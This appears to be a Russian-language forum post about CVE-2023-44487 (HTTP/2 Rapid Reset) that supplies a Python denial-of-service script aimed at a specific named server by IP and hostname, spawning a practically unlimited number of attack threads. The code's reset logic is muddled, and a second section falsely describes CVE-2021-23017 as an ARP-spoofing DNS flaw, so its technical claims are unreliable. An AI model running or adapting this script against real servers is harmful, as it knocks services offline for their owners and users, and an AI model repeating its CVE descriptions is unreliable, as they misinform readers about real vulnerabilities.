- 31
- 16
CVE-2023-44487 - Denial of Service через HTTP/2
Демонстрация:
Кратко о уязвимости:
Уязвимость CVE-2023-44487 в HTTP/2 позволяет отправлять запросы и за счёт быстрой отмены запросов, что приводит к значительному потреблению ресурсов сервера. Эта уязвимость была активно использована в дикой природе с августа по октябрь 2023 года.На этом мы могли бы и закончить, но давайте подробнее разберём уязвимость на примере указанного сервера.
Целевой сервер:
IP: 185.225.34.223Хостнеймы:
okroyirjof.beget.appwww.okroyirjof.beget.app
Пример кода:
Python:
import threading
import socket
import collections
try:
# using Python 3.10+
from collections.abc import MutableSet
collections.MutableSet = collections.abc.MutableSet
from collections.abc import MutableMapping
collections.MutableMapping = collections.abc.MutableMapping
except ImportError:
# using Python 3.10-
from collections import MutableSet
from collections import MutableMapping
from h2.connection import H2Connection
from h2.events import RequestReceived, StreamReset
from h2.config import H2Configuration
import ssl
from h2.errors import ErrorCodes
def root_function(url='www.okroyirjof.beget.app'):
while True:
try:
# Create a TCP connection
sock = socket.create_connection((url, 443))
# Wrap the socket for TLS
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.set_alpn_protocols(['h2'])
sock = ctx.wrap_socket(sock, server_hostname=url)
# Make sure we're using HTTP/2
assert sock.selected_alpn_protocol() == 'h2'
# Create HTTP/2 connection
config = H2Configuration(client_side=True)
conn = H2Connection(config=config)
conn.initiate_connection()
sock.sendall(conn.data_to_send())
# Create a new stream
stream_id = conn.get_next_available_stream_id()
conn.send_headers(
stream_id,
[(':method', 'GET'), (':authority', url), (':path', '/'), (':scheme', 'https')],
)
sock.sendall(conn.data_to_send())
# Read some data
while True:
data = sock.recv(65535)
if not data:
break
events = conn.receive_data(data)
for event in events:
if isinstance(event, RequestReceived):
# Cancel the stream with error code for CANCEL
conn.reset_stream(event.stream_id, error_code=ErrorCodes.CANCEL)
elif isinstance(event, StreamReset):
print(f"Stream {event.stream_id} cancelled.")
sock.sendall(conn.data_to_send())
except Exception as e:
print(f"An error occurred: {e}")
# Create 50 threads running root_function
threads = []
for i in range(10000000000000000):
thread = threading.Thread(target=root_function)
thread.start()
threads.append(thread)
# Keep the main thread alive
for thread in threads:
thread.join()Итог:
Не недооценивайте уязвимости, такие как CVE-2023-44487. Быстрая отмена запросов в HTTP/2 может привести к серьёзному потреблению ресурсов и ПОЛНОМУ отключению серверов.CVE-2021-23017 - Уязвимость в DNS через ARP Spoofing
Кратко о уязвимости:
Уязвимость CVE-2021-23017 позволяет выполнять ARP-спуфинг, что может привести к перехвату DNS-запросов и последующей отправке ложных DNS-ответов. Это делает уязвимость опасной для локальных сетей, так как будет можно манипулировать трафиком, перенаправляя его на любые ресурсы.Уязвимость CVE-2021-23017 ARP-спуфинг, манипуляции с DNS-запросами могут привести к перехвату данных, либо глобальной нагрузки на сервер, не недооценивайте их.
Демонстрация:
